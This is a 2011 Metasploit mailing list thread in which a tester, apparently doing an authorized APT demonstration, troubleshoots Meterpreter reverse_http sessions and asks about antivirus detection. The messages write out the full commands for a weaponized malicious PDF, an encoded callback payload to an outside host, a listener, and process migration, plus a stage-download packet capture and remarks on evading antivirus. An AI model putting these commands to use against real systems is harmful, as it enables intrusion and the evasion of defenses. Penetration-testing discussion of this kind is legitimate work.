Metasploit mailing list archives
Re: Meterpreter Reverse HTTP(s) Payloads after last update
From: Enis Sahin <enis.c.sahin () gmail com>
Date: Fri, 30 Sep 2011 23:04:27 +0300
I just realized that there is already a bug open for it (BUG#4928). I'll be able to re-test it on monday morning with the latest version with AV disabled and share my findings. Enis On 30 September 2011 22:47, Enis Sahin <enis.c.sahin () gmail com> wrote:
Sherif, I didn't record the output of my console but it was the same as your output. Session 1 opened...Then nothing. I manually interact with the session and commands like sysinfo are not recognized. However I have the packet capture (I'll paste it below) and the I used the following commands exactly while I created the exploit and the listener: use exploit/windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_http set lport 80 set lhost "my internal portforwarded IP" set encoders x86/shikata_ga_nai -c 12 set InitialAutoRunScript run migrate.rb explorer.exe exploit back use multi/handler set payload windows/meterpreter/reverse_http set lport 80 set lhots "my dyndns url" exploit -j And here's the packet capture (I'm snipping most of it but these parts seemed relevant to me) GET /INITM HTTP/1.1 Host: XXXX.dyndns.com Pragma: no-cache Connection: Keep-Alive User-Agent: wininet HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 752128 Server: Rex Connection: Keep-Alive MZ.....[REU............Wh....P..h..* h....P.............................!..L.!This program cannot be run in DOS mode. .... CorExitProcess..m.s.c.o.r.e.e...d.l.l...runtime error .. ..TLOSS error ...SING error ....DOMAIN error ......R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. ......R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. ..R6032 - not enough space for locale information ......R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. ..R6030 - CRT not initialized ..R6028 - unable to initialize heap ....R6027 - not enough space for lowio initialization ....R6026 - not enough space for stdio initialization ....R6025 - pure virtual function call ...R6024 - not enough space for _onexit/atexit table ....R6019 - unable to open console device ....R6018 - unexpected heap error ....R6017 - unexpected multithread lock error ....R6016 - not enough space for thread data . This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. ...R6009 - not enough space for environment .R6008 - not enough space for arguments ...R6002 - floating point support not loaded ....Microsoft Visual C++ Runtime Library.... ......<program name unknown>..Runtime Error! Program: ....@...A..EncodePointer...DecodePointer...FlsFree.FlsSetValue.FlsGetValue.FlsAlloc............................................................................................................................e+000.......~.PA......GAIsProcessorFeaturePresent...KERNEL32....(.n.u.l.l.).....(null)...................EEE.....50.P... They are all detected by AV now so I'll probably try to do the simulation with a web based exploit and hope that the payload doesn't get detected when it doesn't get written to disk (web gateway is quite good about catching exploit packs and hex encoded characters coming in with HTTP so it will be the exploit which triggers alarms this time probably but we'll see...). On 30 September 2011 17:06, Sherif El-Deeb <archeldeeb () gmail com> wrote:Last time I asked for help, I attached console output, my configurations, and everything I felt will help defining the issue, I suggest you do the same. About the AV detection issue, just google "evading av with metasploit", and you will eventually come to the conclusion that if you want your stuff to become undetected, you will HAVE TO CODE SOMETHING ON YOUR OWN, period. connection issues: plz provide more info. Regards, On Sep 30, 2011 4:48 PM, "Enis Sahin" <enis.c.sahin () gmail com> wrote:Oh and additional information. I've tried using the previous version of the payload since it stilldoesn'tget detected by AV. But, setting the lhost in multi/handler to theactualIP, dyndns URL of the Modem and 0.0.0.0 results in the same connection problem. On 30 September 2011 16:06, Enis Sahin <enis.c.sahin () gmail com> wrote:Hi everybody, I've had the chance to test the windows/meterpreter/reverse_httppayloadfor an APT demonstration project in a conrporate environment recently. Before the update on September 23 both the http and https versions had connection problems upon session connection, it would go idle andsessionwouldn't accept any commands. The Wireshark capture show that theinitialresponse packet had the error "This program cannot be run in Dos mode".Butit was undetected by the AV solution used. After the update, the AV immediately detects the malicious file as soonasit is extracted from the zip file. I know that the AV detects thereversehttp payload because using the same fileformat exploit with a reversetcpconnection payload doesn't get detected. The same goes for the previous version of the paylod, I still have the version with connectionproblems (ina file created with the same file format exploit) and it staysundetected onthe desktop. As a side note I've used the same encoding for all payloads I've triedtobe able to identify the reason for detection. Any ideas about why the payload gets detected after the update? Thanks. Enis -- http://www.enissahin.com | http://twitter.com/enis_sahin-- http://www.enissahin.com | http://twitter.com/enis_sahin-- http://www.enissahin.com | http://twitter.com/enis_sahin
-- http://www.enissahin.com | http://twitter.com/enis_sahin
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Meterpreter Reverse HTTP(s) Payloads after last update Enis Sahin (Sep 30)
- Re: Meterpreter Reverse HTTP(s) Payloads after last update Enis Sahin (Sep 30)
- Re: Meterpreter Reverse HTTP(s) Payloads after last update Sherif El-Deeb (Sep 30)
- Re: Meterpreter Reverse HTTP(s) Payloads after last update Enis Sahin (Sep 30)
- Re: Meterpreter Reverse HTTP(s) Payloads after last update Enis Sahin (Sep 30)
- Re: Meterpreter Reverse HTTP(s) Payloads after last update Sherif El-Deeb (Sep 30)
- Re: Meterpreter Reverse HTTP(s) Payloads after last update Enis Sahin (Sep 30)